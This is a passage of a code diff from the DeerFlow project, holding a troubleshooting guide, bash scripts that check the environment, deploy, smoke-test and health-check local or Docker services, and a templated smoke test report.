|
||||
**Solutions**:
|
||||
1. Check frontend logs:
|
||||
```bash
|
||||
tail -f logs/frontend.log
|
||||
```
|
||||
|
||||
2. Check whether Node.js version is 22+
|
||||
3. Reinstall frontend dependencies:
|
||||
```bash
|
||||
cd frontend
|
||||
rm -rf node_modules .next
|
||||
pnpm install
|
||||
```
|
||||
|
||||
4. Restart services:
|
||||
```bash
|
||||
make stop
|
||||
make dev-daemon
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: Gateway Fails to Start
|
||||
|
||||
**Symptoms**:
|
||||
Errors appear in `gateway.log`.
|
||||
|
||||
**Solutions**:
|
||||
1. Check gateway logs:
|
||||
```bash
|
||||
tail -f logs/gateway.log
|
||||
```
|
||||
|
||||
2. Check whether config.yaml exists and has valid formatting
|
||||
3. Check whether Python dependencies are complete:
|
||||
```bash
|
||||
cd backend
|
||||
uv sync
|
||||
```
|
||||
|
||||
4. Confirm that the LangGraph service is running normally (if not in gateway mode)
|
||||
|
||||
---
|
||||
|
||||
### Issue: LangGraph Fails to Start
|
||||
|
||||
**Symptoms**:
|
||||
Errors appear in `langgraph.log`.
|
||||
|
||||
**Solutions**:
|
||||
1. Check LangGraph logs:
|
||||
```bash
|
||||
tail -f logs/langgraph.log
|
||||
```
|
||||
|
||||
2. Check config.yaml
|
||||
3. Check whether Python dependencies are complete
|
||||
4. Confirm that port 2024 is not occupied
|
||||
|
||||
---
|
||||
|
||||
## Docker-Related Issues
|
||||
|
||||
### Issue: Docker Commands Cannot Run
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
Cannot connect to the Docker daemon
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Confirm that Docker Desktop is running
|
||||
2. macOS: check whether the Docker icon appears in the top menu bar
|
||||
3. Linux: run `sudo systemctl start docker`
|
||||
4. Run `docker info` again to verify
|
||||
|
||||
---
|
||||
|
||||
### Issue: `make docker-init` Fails to Pull the Image
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
Error pulling image: connection refused
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Check network connectivity
|
||||
2. Configure a Docker image mirror if needed
|
||||
3. Check whether a proxy is required
|
||||
4. Switch to local installation mode if necessary (recommended)
|
||||
|
||||
---
|
||||
|
||||
## Configuration File Issues
|
||||
|
||||
### Issue: config.yaml Is Missing or Invalid
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
Error: could not read config.yaml
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Regenerate the configuration file:
|
||||
```bash
|
||||
make config
|
||||
```
|
||||
|
||||
2. Check YAML syntax:
|
||||
- Make sure indentation is correct (use 2 spaces)
|
||||
- Make sure there are no tab characters
|
||||
- Check that there is a space after each colon
|
||||
|
||||
3. Use a YAML validation tool to check the format
|
||||
|
||||
---
|
||||
|
||||
### Issue: Model API Key Is Not Configured
|
||||
|
||||
**Symptoms**:
|
||||
After services start, API requests fail with authentication errors.
|
||||
|
||||
**Solutions**:
|
||||
1. Edit the .env file and add the API key:
|
||||
```bash
|
||||
OPENAI_API_KEY=your-actual-api-key-here
|
||||
```
|
||||
|
||||
2. Restart services (local mode):
|
||||
```bash
|
||||
make stop
|
||||
make dev-daemon
|
||||
```
|
||||
|
||||
3. Restart services (Docker mode):
|
||||
```bash
|
||||
make docker-stop
|
||||
make docker-start
|
||||
```
|
||||
|
||||
4. Confirm that the model configuration in config.yaml references the environment variable correctly
|
||||
|
||||
---
|
||||
|
||||
## Service Health Check Issues
|
||||
|
||||
### Issue: Frontend Page Is Not Accessible
|
||||
|
||||
**Symptoms**:
|
||||
The browser shows a connection failure when visiting http://localhost:2026.
|
||||
|
||||
**Solutions** (local mode):
|
||||
1. Confirm that the nginx process is running:
|
||||
```bash
|
||||
ps aux | grep nginx
|
||||
```
|
||||
|
||||
2. Check nginx logs:
|
||||
```bash
|
||||
tail -f logs/nginx.log
|
||||
```
|
||||
|
||||
3. Check firewall settings
|
||||
|
||||
**Solutions** (Docker mode):
|
||||
1. Confirm that the nginx container is running:
|
||||
```bash
|
||||
docker ps | grep nginx
|
||||
```
|
||||
|
||||
2. Check nginx logs:
|
||||
```bash
|
||||
cd docker && docker compose -p deer-flow-dev -f docker-compose-dev.yaml logs nginx
|
||||
```
|
||||
|
||||
3. Check firewall settings
|
||||
|
||||
---
|
||||
|
||||
### Issue: API Gateway Health Check Fails
|
||||
|
||||
**Symptoms**:
|
||||
Accessing `/health` returns an error or times out.
|
||||
|
||||
**Solutions** (local mode):
|
||||
1. Check gateway logs:
|
||||
```bash
|
||||
tail -f logs/gateway.log
|
||||
```
|
||||
|
||||
2. Confirm that config.yaml exists and has valid formatting
|
||||
3. Check whether Python dependencies are complete
|
||||
4. Confirm that the LangGraph service is running normally
|
||||
|
||||
**Solutions** (Docker mode):
|
||||
1. Check gateway container logs:
|
||||
```bash
|
||||
make docker-logs-gateway
|
||||
```
|
||||
|
||||
2. Confirm that config.yaml is mounted correctly
|
||||
3. Check whether Python dependencies are complete
|
||||
4. Confirm that the LangGraph service is running normally
|
||||
|
||||
---
|
||||
|
||||
## Common Diagnostic Commands
|
||||
|
||||
### Local Mode Diagnostics
|
||||
|
||||
#### View All Service Processes
|
||||
```bash
|
||||
ps aux | grep -E "(langgraph|uvicorn|next|nginx)" | grep -v grep
|
||||
```
|
||||
|
||||
#### View Service Logs
|
||||
```bash
|
||||
# View all logs
|
||||
tail -f logs/*.log
|
||||
|
||||
# View specific service logs
|
||||
tail -f logs/langgraph.log
|
||||
tail -f logs/gateway.log
|
||||
tail -f logs/frontend.log
|
||||
tail -f logs/nginx.log
|
||||
```
|
||||
|
||||
#### Stop All Services
|
||||
```bash
|
||||
make stop
|
||||
```
|
||||
|
||||
#### Fully Reset the Local Environment
|
||||
```bash
|
||||
make stop
|
||||
make clean
|
||||
make config
|
||||
make install
|
||||
make dev-daemon
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Docker Mode Diagnostics
|
||||
|
||||
#### View All Container Status
|
||||
```bash
|
||||
docker ps -a
|
||||
```
|
||||
|
||||
#### View Container Resource Usage
|
||||
```bash
|
||||
docker stats
|
||||
```
|
||||
|
||||
#### Enter a Container for Debugging
|
||||
```bash
|
||||
docker exec -it deer-flow-gateway sh
|
||||
```
|
||||
|
||||
#### Clean Up All DeerFlow-Related Containers and Images
|
||||
```bash
|
||||
make docker-stop
|
||||
cd docker && docker compose -p deer-flow-dev -f docker-compose-dev.yaml down -v
|
||||
```
|
||||
|
||||
#### Fully Reset the Docker Environment
|
||||
```bash
|
||||
make docker-stop
|
||||
make clean
|
||||
make config
|
||||
make docker-init
|
||||
make docker-start
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Get More Help
|
||||
|
||||
If the solutions above do not resolve the issue:
|
||||
1. Check the GitHub issues for the project: https://github.com/bytedance/deer-flow/issues
|
||||
2. Review the project documentation: README.md and the `backend/docs/` directory
|
||||
3. Open a new issue and include detailed error logs
|
||||
+80
@@ -0,0 +1,80 @@
|
||||
#!/usr/bin/env bash
|
||||
set -e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Checking Docker Environment"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
# Check whether Docker is installed
|
||||
if command -v docker >/dev/null 2>&1; then
|
||||
echo "✓ Docker is installed"
|
||||
docker --version
|
||||
else
|
||||
echo "✗ Docker is not installed"
|
||||
exit 1
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check the Docker daemon
|
||||
if docker info >/dev/null 2>&1; then
|
||||
echo "✓ Docker daemon is running normally"
|
||||
else
|
||||
echo "✗ Docker daemon is not running"
|
||||
echo " Please start Docker Desktop or the Docker service"
|
||||
exit 1
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check Docker Compose
|
||||
if docker compose version >/dev/null 2>&1; then
|
||||
echo "✓ Docker Compose is available"
|
||||
docker compose version
|
||||
else
|
||||
echo "✗ Docker Compose is not available"
|
||||
exit 1
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check port 2026
|
||||
if ! command -v lsof >/dev/null 2>&1; then
|
||||
echo "✗ lsof is required to check whether port 2026 is available"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
port_2026_usage="$(lsof -nP -iTCP:2026 -sTCP:LISTEN 2>/dev/null || true)"
|
||||
if [ -n "$port_2026_usage" ]; then
|
||||
echo "⚠ Port 2026 is already in use"
|
||||
echo " Occupying process:"
|
||||
echo "$port_2026_usage"
|
||||
|
||||
deerflow_process_found=0
|
||||
while IFS= read -r pid; do
|
||||
if [ -z "$pid" ]; then
|
||||
continue
|
||||
fi
|
||||
|
||||
process_command="$(ps -p "$pid" -o command= 2>/dev/null || true)"
|
||||
case "$process_command" in
|
||||
*[Dd]eer[Ff]low*|*[Dd]eerflow*|*[Nn]ginx*deerflow*|*deerflow/*[Nn]ginx*)
|
||||
deerflow_process_found=1
|
||||
;;
|
||||
esac
|
||||
done <<EOF
|
||||
$(printf '%s\n' "$port_2026_usage" | awk 'NR > 1 {print $2}')
|
||||
EOF
|
||||
|
||||
if [ "$deerflow_process_found" -eq 1 ]; then
|
||||
echo "✓ Port 2026 is occupied by DeerFlow"
|
||||
else
|
||||
echo "✗ Port 2026 must be free before starting DeerFlow"
|
||||
exit 1
|
||||
fi
|
||||
else
|
||||
echo "✓ Port 2026 is available"
|
||||
fi
|
||||
echo ""
|
||||
|
||||
echo "=========================================="
|
||||
echo " Docker Environment Check Complete"
|
||||
echo "=========================================="
|
||||
+93
@@ -0,0 +1,93 @@
|
||||
#!/usr/bin/env bash
|
||||
set -e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Checking Local Development Environment"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
all_passed=true
|
||||
|
||||
# Check Node.js
|
||||
echo "1. Checking Node.js..."
|
||||
if command -v node >/dev/null 2>&1; then
|
||||
NODE_VERSION=$(node --version | sed 's/v//')
|
||||
NODE_MAJOR=$(echo "$NODE_VERSION" | cut -d. -f1)
|
||||
if [ "$NODE_MAJOR" -ge 22 ]; then
|
||||
echo "✓ Node.js is installed (version: $NODE_VERSION)"
|
||||
else
|
||||
echo "✗ Node.js version is too old (current: $NODE_VERSION, required: 22+)"
|
||||
all_passed=false
|
||||
fi
|
||||
else
|
||||
echo "✗ Node.js is not installed"
|
||||
all_passed=false
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check pnpm
|
||||
echo "2. Checking pnpm..."
|
||||
if command -v pnpm >/dev/null 2>&1; then
|
||||
echo "✓ pnpm is installed (version: $(pnpm --version))"
|
||||
else
|
||||
echo "✗ pnpm is not installed"
|
||||
echo " Install command: npm install -g pnpm"
|
||||
all_passed=false
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check uv
|
||||
echo "3. Checking uv..."
|
||||
if command -v uv >/dev/null 2>&1; then
|
||||
echo "✓ uv is installed (version: $(uv --version))"
|
||||
else
|
||||
echo "✗ uv is not installed"
|
||||
all_passed=false
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check nginx
|
||||
echo "4. Checking nginx..."
|
||||
if command -v nginx >/dev/null 2>&1; then
|
||||
echo "✓ nginx is installed (version: $(nginx -v 2>&1))"
|
||||
else
|
||||
echo "✗ nginx is not installed"
|
||||
echo " macOS: brew install nginx"
|
||||
echo " Linux: install it with the system package manager"
|
||||
all_passed=false
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check ports
|
||||
echo "5. Checking ports..."
|
||||
if ! command -v lsof >/dev/null 2>&1; then
|
||||
echo "✗ lsof is not installed, so port availability cannot be verified"
|
||||
echo " Install lsof and rerun this check"
|
||||
all_passed=false
|
||||
else
|
||||
for port in 2026 3000 8001 2024; do
|
||||
if lsof -i :$port >/dev/null 2>&1; then
|
||||
echo "⚠ Port $port is already in use:"
|
||||
lsof -i :$port | head -2
|
||||
all_passed=false
|
||||
else
|
||||
echo "✓ Port $port is available"
|
||||
fi
|
||||
done
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Summary
|
||||
echo "=========================================="
|
||||
echo " Environment Check Summary"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
if [ "$all_passed" = true ]; then
|
||||
echo "✅ All environment checks passed!"
|
||||
echo ""
|
||||
echo "Next step: run make install to install dependencies"
|
||||
exit 0
|
||||
else
|
||||
echo "❌ Some checks failed. Please fix the issues above first"
|
||||
exit 1
|
||||
fi
|
||||
+65
@@ -0,0 +1,65 @@
|
||||
#!/usr/bin/env bash
|
||||
set -e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Docker Deployment"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
# Check config.yaml
|
||||
if [ ! -f "config.yaml" ]; then
|
||||
echo "config.yaml does not exist. Generating it..."
|
||||
make config
|
||||
echo ""
|
||||
echo "⚠ Please edit config.yaml to configure your models and API keys"
|
||||
echo " Then run this script again"
|
||||
exit 1
|
||||
else
|
||||
echo "✓ config.yaml exists"
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check the .env file
|
||||
if [ ! -f ".env" ]; then
|
||||
echo ".env does not exist. Copying it from the example..."
|
||||
if [ -f ".env.example" ]; then
|
||||
cp .env.example .env
|
||||
echo "✓ Created the .env file"
|
||||
else
|
||||
echo "⚠ .env.example does not exist. Please create the .env file manually"
|
||||
fi
|
||||
else
|
||||
echo "✓ .env file exists"
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check the frontend .env file
|
||||
if [ ! -f "frontend/.env" ]; then
|
||||
echo "frontend/.env does not exist. Copying it from the example..."
|
||||
if [ -f "frontend/.env.example" ]; then
|
||||
cp frontend/.env.example frontend/.env
|
||||
echo "✓ Created the frontend/.env file"
|
||||
else
|
||||
echo "⚠ frontend/.env.example does not exist. Please create frontend/.env manually"
|
||||
fi
|
||||
else
|
||||
echo "✓ frontend/.env file exists"
|
||||
fi
|
||||
echo ""
|
||||
# Initialize the Docker environment
|
||||
echo "Initializing the Docker environment..."
|
||||
make docker-init
|
||||
echo ""
|
||||
|
||||
# Start Docker services
|
||||
echo "Starting Docker services..."
|
||||
make docker-start
|
||||
echo ""
|
||||
|
||||
echo "=========================================="
|
||||
echo " Deployment Complete"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
echo "🌐 Access URL: http://localhost:2026"
|
||||
echo "📋 View logs: make docker-logs"
|
||||
echo "🛑 Stop services: make docker-stop"
|
||||
+63
@@ -0,0 +1,63 @@
|
||||
#!/usr/bin/env bash
|
||||
set -e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Local Mode Deployment"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
# Check config.yaml
|
||||
if [ ! -f "config.yaml" ]; then
|
||||
echo "config.yaml does not exist. Generating it..."
|
||||
make config
|
||||
echo ""
|
||||
echo "⚠ Please edit config.yaml to configure your models and API keys"
|
||||
echo " Then run this script again"
|
||||
exit 1
|
||||
else
|
||||
echo "✓ config.yaml exists"
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check the .env file
|
||||
if [ ! -f ".env" ]; then
|
||||
echo ".env does not exist. Copying it from the example..."
|
||||
if [ -f ".env.example" ]; then
|
||||
cp .env.example .env
|
||||
echo "✓ Created the .env file"
|
||||
else
|
||||
echo "⚠ .env.example does not exist. Please create the .env file manually"
|
||||
fi
|
||||
else
|
||||
echo "✓ .env file exists"
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Check dependencies
|
||||
echo "Checking dependencies..."
|
||||
make check
|
||||
echo ""
|
||||
|
||||
# Install dependencies
|
||||
echo "Installing dependencies..."
|
||||
make install
|
||||
echo ""
|
||||
|
||||
# Start services
|
||||
echo "Starting services (background mode)..."
|
||||
make dev-daemon
|
||||
echo ""
|
||||
|
||||
echo "=========================================="
|
||||
echo " Deployment Complete"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
echo "🌐 Access URL: http://localhost:2026"
|
||||
echo "📋 View logs:"
|
||||
echo " - logs/langgraph.log"
|
||||
echo " - logs/gateway.log"
|
||||
echo " - logs/frontend.log"
|
||||
echo " - logs/nginx.log"
|
||||
echo "🛑 Stop services: make stop"
|
||||
echo ""
|
||||
echo "Please wait 90-120 seconds for all services to start completely, then run the health check"
|
||||
@@ -0,0 +1,70 @@
|
||||
#!/usr/bin/env bash
|
||||
set +e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Frontend Page Smoke Check"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
BASE_URL="${BASE_URL:-http://localhost:2026}"
|
||||
DOC_PATH="${DOC_PATH:-/en/docs}"
|
||||
|
||||
all_passed=true
|
||||
|
||||
check_status() {
|
||||
local name="$1"
|
||||
local url="$2"
|
||||
local expected_re="$3"
|
||||
|
||||
local status
|
||||
status="$(curl -s -o /dev/null -w "%{http_code}" -L "$url")"
|
||||
if echo "$status" | grep -Eq "$expected_re"; then
|
||||
echo "✓ $name ($url) -> $status"
|
||||
else
|
||||
echo "✗ $name ($url) -> $status (expected: $expected_re)"
|
||||
all_passed=false
|
||||
fi
|
||||
}
|
||||
|
||||
check_final_url() {
|
||||
local name="$1"
|
||||
local url="$2"
|
||||
local expected_path_re="$3"
|
||||
|
||||
local effective
|
||||
effective="$(curl -s -o /dev/null -w "%{url_effective}" -L "$url")"
|
||||
if echo "$effective" | grep -Eq "$expected_path_re"; then
|
||||
echo "✓ $name redirect target -> $effective"
|
||||
else
|
||||
echo "✗ $name redirect target -> $effective (expected path: $expected_path_re)"
|
||||
all_passed=false
|
||||
fi
|
||||
}
|
||||
|
||||
echo "1. Checking entry pages..."
|
||||
check_status "Landing page" "${BASE_URL}/" "200"
|
||||
check_status "Workspace redirect" "${BASE_URL}/workspace" "200|301|302|307|308"
|
||||
check_final_url "Workspace redirect" "${BASE_URL}/workspace" "/workspace/chats/"
|
||||
echo ""
|
||||
|
||||
echo "2. Checking key workspace routes..."
|
||||
check_status "New chat page" "${BASE_URL}/workspace/chats/new" "200"
|
||||
check_status "Chats list page" "${BASE_URL}/workspace/chats" "200"
|
||||
check_status "Agents gallery page" "${BASE_URL}/workspace/agents" "200"
|
||||
echo ""
|
||||
|
||||
echo "3. Checking docs route (optional)..."
|
||||
check_status "Docs page" "${BASE_URL}${DOC_PATH}" "200|404"
|
||||
echo ""
|
||||
|
||||
echo "=========================================="
|
||||
echo " Frontend Smoke Check Summary"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
if [ "$all_passed" = true ]; then
|
||||
echo "✅ Frontend smoke checks passed!"
|
||||
exit 0
|
||||
else
|
||||
echo "❌ Frontend smoke checks failed"
|
||||
exit 1
|
||||
fi
|
||||
+125
@@ -0,0 +1,125 @@
|
||||
#!/usr/bin/env bash
|
||||
set +e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Service Health Check"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
all_passed=true
|
||||
mode="${SMOKE_TEST_MODE:-auto}"
|
||||
summary_hint="make logs"
|
||||
|
||||
print_step() {
|
||||
echo "$1"
|
||||
}
|
||||
|
||||
check_http_status() {
|
||||
local name="$1"
|
||||
local url="$2"
|
||||
local expected_re="$3"
|
||||
local status
|
||||
|
||||
status="$(curl -s -o /dev/null -w "%{http_code}" "$url" 2>/dev/null)"
|
||||
if echo "$status" | grep -Eq "$expected_re"; then
|
||||
echo "✓ $name is accessible ($url -> $status)"
|
||||
else
|
||||
echo "✗ $name is not accessible ($url -> ${status:-000})"
|
||||
all_passed=false
|
||||
fi
|
||||
}
|
||||
|
||||
check_listen_port() {
|
||||
local name="$1"
|
||||
local port="$2"
|
||||
|
||||
if lsof -nP -iTCP:"$port" -sTCP:LISTEN >/dev/null 2>&1; then
|
||||
echo "✓ $name is listening on port $port"
|
||||
else
|
||||
echo "✗ $name is not listening on port $port"
|
||||
all_passed=false
|
||||
fi
|
||||
}
|
||||
|
||||
docker_available() {
|
||||
command -v docker >/dev/null 2>&1 && docker info >/dev/null 2>&1
|
||||
}
|
||||
|
||||
detect_mode() {
|
||||
case "$mode" in
|
||||
local|docker)
|
||||
echo "$mode"
|
||||
return
|
||||
;;
|
||||
esac
|
||||
|
||||
if docker_available && docker ps --format "{{.Names}}" | grep -q "deer-flow"; then
|
||||
echo "docker"
|
||||
else
|
||||
echo "local"
|
||||
fi
|
||||
}
|
||||
|
||||
mode="$(detect_mode)"
|
||||
|
||||
echo "Deployment mode: $mode"
|
||||
echo ""
|
||||
|
||||
if [ "$mode" = "docker" ]; then
|
||||
summary_hint="make docker-logs"
|
||||
print_step "1. Checking container status..."
|
||||
if docker ps --format "{{.Names}}" | grep -q "deer-flow"; then
|
||||
echo "✓ Containers are running:"
|
||||
docker ps --format " - {{.Names}} ({{.Status}})"
|
||||
else
|
||||
echo "✗ No DeerFlow-related containers are running"
|
||||
all_passed=false
|
||||
fi
|
||||
else
|
||||
summary_hint="logs/{langgraph,gateway,frontend,nginx}.log"
|
||||
print_step "1. Checking local service ports..."
|
||||
check_listen_port "Nginx" 2026
|
||||
check_listen_port "Frontend" 3000
|
||||
check_listen_port "Gateway" 8001
|
||||
check_listen_port "LangGraph" 2024
|
||||
fi
|
||||
echo ""
|
||||
|
||||
echo "2. Waiting for services to fully start (30 seconds)..."
|
||||
sleep 30
|
||||
echo ""
|
||||
|
||||
echo "3. Checking frontend service..."
|
||||
check_http_status "Frontend service" "http://localhost:2026" "200|301|302|307|308"
|
||||
echo ""
|
||||
|
||||
echo "4. Checking API Gateway..."
|
||||
health_response=$(curl -s http://localhost:2026/health 2>/dev/null)
|
||||
if [ $? -eq 0 ] && [ -n "$health_response" ]; then
|
||||
echo "✓ API Gateway health check passed"
|
||||
echo " Response: $health_response"
|
||||
else
|
||||
echo "✗ API Gateway health check failed"
|
||||
all_passed=false
|
||||
fi
|
||||
echo ""
|
||||
|
||||
echo "5. Checking LangGraph service..."
|
||||
check_http_status "LangGraph service" "http://localhost:2024/" "200|301|302|307|308|404"
|
||||
echo ""
|
||||
|
||||
echo "=========================================="
|
||||
echo " Health Check Summary"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
if [ "$all_passed" = true ]; then
|
||||
echo "✅ All checks passed!"
|
||||
echo ""
|
||||
echo "🌐 Application URL: http://localhost:2026"
|
||||
exit 0
|
||||
else
|
||||
echo "❌ Some checks failed"
|
||||
echo ""
|
||||
echo "Please review: $summary_hint"
|
||||
exit 1
|
||||
fi
|
||||
+49
@@ -0,0 +1,49 @@
|
||||
#!/usr/bin/env bash
|
||||
set -e
|
||||
|
||||
echo "=========================================="
|
||||
echo " Pulling the Latest Code"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
# Check whether the current directory is a Git repository
|
||||
if [ ! -d ".git" ]; then
|
||||
echo "✗ The current directory is not a Git repository"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check Git status
|
||||
echo "Checking Git status..."
|
||||
if git status --porcelain | grep -q .; then
|
||||
echo "⚠ Uncommitted changes detected:"
|
||||
git status --short
|
||||
echo ""
|
||||
echo "Please commit or stash your changes before continuing"
|
||||
echo "Options:"
|
||||
echo " 1. git add . && git commit -m 'Save changes'"
|
||||
echo " 2. git stash (stash changes and restore them later)"
|
||||
echo " 3. git reset --hard HEAD (discard local changes - use with caution)"
|
||||
exit 1
|
||||
else
|
||||
echo "✓ Working tree is clean"
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# Fetch remote updates
|
||||
echo "Fetching remote updates..."
|
||||
git fetch origin main
|
||||
echo ""
|
||||
|
||||
# Pull the latest code
|
||||
echo "Pulling the latest code..."
|
||||
git pull origin main
|
||||
echo ""
|
||||
|
||||
# Show the latest commit
|
||||
echo "Latest commit:"
|
||||
git log -1 --oneline
|
||||
echo ""
|
||||
|
||||
echo "=========================================="
|
||||
echo " Code Update Complete"
|
||||
echo "=========================================="
|
||||
@@ -0,0 +1,180 @@
|
||||
# DeerFlow Smoke Test Report
|
||||
|
||||
**Test Date**: {{test_date}}
|
||||
**Test Environment**: {{test_environment}}
|
||||
**Deployment Mode**: Docker
|
||||
**Test Version**: {{git_commit}}
|
||||
|
||||
---
|
||||
|
||||
## Execution Summary
|
||||
|
||||
| Metric | Status |
|
||||
|------|------|
|
||||
| Total Test Phases | 6 |
|
||||
| Passed Phases | {{passed_stages}} |
|
||||
| Failed Phases | {{failed_stages}} |
|
||||
| Overall Conclusion | **{{overall_status}}** |
|
||||
|
||||
### Key Test Cases
|
||||
|
||||
| Case | Result | Details |
|
||||
|------|--------|---------|
|
||||
| Code update check | {{case_code_update}} | {{case_code_update_details}} |
|
||||
| Environment check | {{case_env_check}} | {{case_env_check_details}} |
|
||||
| Configuration preparation | {{case_config_prep}} | {{case_config_prep_details}} |
|
||||
| Deployment | {{case_deploy}} | {{case_deploy_details}} |
|
||||
| Health check | {{case_health_check}} | {{case_health_check_details}} |
|
||||
| Frontend routes | {{case_frontend_routes_overall}} | {{case_frontend_routes_details}} |
|
||||
|
||||
---
|
||||
|
||||
## Detailed Test Results
|
||||
|
||||
### Phase 1: Code Update Check
|
||||
|
||||
- [x] Confirm current directory - {{status_dir_check}}
|
||||
- [x] Check Git status - {{status_git_status}}
|
||||
- [x] Pull latest code - {{status_git_pull}}
|
||||
- [x] Confirm code update - {{status_git_verify}}
|
||||
|
||||
**Phase Status**: {{stage1_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 2: Docker Environment Check
|
||||
|
||||
- [x] Docker version - {{status_docker_version}}
|
||||
- [x] Docker daemon - {{status_docker_daemon}}
|
||||
- [x] Docker Compose - {{status_docker_compose}}
|
||||
- [x] Port check - {{status_port_check}}
|
||||
|
||||
**Phase Status**: {{stage2_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 3: Configuration Preparation
|
||||
|
||||
- [x] config.yaml - {{status_config_yaml}}
|
||||
- [x] .env file - {{status_env_file}}
|
||||
- [x] Model configuration - {{status_model_config}}
|
||||
|
||||
**Phase Status**: {{stage3_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 4: Docker Deployment
|
||||
|
||||
- [x] docker-init - {{status_docker_init}}
|
||||
- [x] docker-start - {{status_docker_start}}
|
||||
- [x] Service startup wait - {{status_wait_startup}}
|
||||
|
||||
**Phase Status**: {{stage4_status}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 5: Service Health Check
|
||||
|
||||
- [x] Container status - {{status_containers}}
|
||||
- [x] Frontend service - {{status_frontend}}
|
||||
- [x] API Gateway - {{status_api_gateway}}
|
||||
- [x] LangGraph service - {{status_langgraph}}
|
||||
|
||||
**Phase Status**: {{stage5_status}}
|
||||
|
||||
---
|
||||
|
||||
### Frontend Routes Smoke Results
|
||||
|
||||
| Route | Status | Details |
|
||||
|-------|--------|---------|
|
||||
| Landing `/` | {{landing_status}} | {{landing_details}} |
|
||||
| Workspace redirect `/workspace` | {{workspace_redirect_status}} | target {{workspace_redirect_target}} |
|
||||
| New chat `/workspace/chats/new` | {{new_chat_status}} | {{new_chat_details}} |
|
||||
| Chats list `/workspace/chats` | {{chats_list_status}} | {{chats_list_details}} |
|
||||
| Agents gallery `/workspace/agents` | {{agents_gallery_status}} | {{agents_gallery_details}} |
|
||||
| Docs `{{docs_path}}` | {{docs_status}} | {{docs_details}} |
|
||||
|
||||
**Summary**: {{frontend_routes_summary}}
|
||||
|
||||
---
|
||||
|
||||
### Phase 6: Test Report Generation
|
||||
|
||||
- [x] Result summary - {{status_summary}}
|
||||
- [x] Issue log - {{status_issues}}
|
||||
- [x] Report generation - {{status_report}}
|
||||
|
||||
**Phase Status**: {{stage6_status}}
|
||||
|
||||
---
|
||||
|
||||
## Issue Log
|
||||
|
||||
### Issue 1
|
||||
**Description**: {{issue1_description}}
|
||||
**Severity**: {{issue1_severity}}
|
||||
**Solution**: {{issue1_solution}}
|
||||
|
||||
---
|
||||
|
||||
## Environment Information
|
||||
|
||||
### Docker Version
|
||||
```text
|
||||
{{docker_version_output}}
|
||||
```
|
||||
|
||||
### Git Information
|
||||
```text
|
||||
Repository: {{git_repo}}
|
||||
Branch: {{git_branch}}
|
||||
Commit: {{git_commit}}
|
||||
Commit Message: {{git_commit_message}}
|
||||
```
|
||||
|
||||
### Configuration Summary
|
||||
- config.yaml exists: {{config_exists}}
|
||||
- .env file exists: {{env_exists}}
|
||||
- Number of configured models: {{model_count}}
|
||||
|
||||
---
|
||||
|
||||
## Container Status
|
||||
|
||||
| Container Name | Status | Uptime |
|
||||
|----------|------|----------|
|
||||
| deer-flow-nginx | {{nginx_status}} | {{nginx_uptime}} |
|
||||
| deer-flow-frontend | {{frontend_status}} | {{frontend_uptime}} |
|
||||
| deer-flow-gateway | {{gateway_status}} | {{gateway_uptime}} |
|
||||
| deer-flow-langgraph | {{langgraph_status}} | {{langgraph_uptime}} |
|
||||
|
||||
---
|
||||
|
||||
## Recommendations and Next Steps
|
||||
|
||||
### If the Test Passes
|
||||
1. [ ] Visit http://localhost:2026 to start using DeerFlow
|
||||
2. [ ] Configure your preferred model if it is not configured yet
|
||||
3. [ ] Explore available skills
|
||||
4. [ ] Refer to the documentation to learn more features
|
||||
|
||||
### If the Test Fails
|
||||
1. [ ] Review references/troubleshooting.md for common solutions
|
||||
2. [ ] Check Docker logs: `make docker-logs`
|
||||
3. [ ] Verify configuration file format and content
|
||||
4. [ ] If needed, fully reset the environment: `make clean && make config && make docker-init && make docker-start`
|
||||
|
||||
---
|
||||
|
||||
## Appendix
|
||||
|
||||
### Full Logs
|
||||
{{full_logs}}
|
||||
|
||||
### Tester
|
||||
{{tester_name}}
|
||||
|
||||
---
|
||||
|
||||
*Report generated at: {{report_time}}*
|
||||
@@ -0,0 +1,185 @@
|
||||
# DeerFlow Smoke Test Report
|
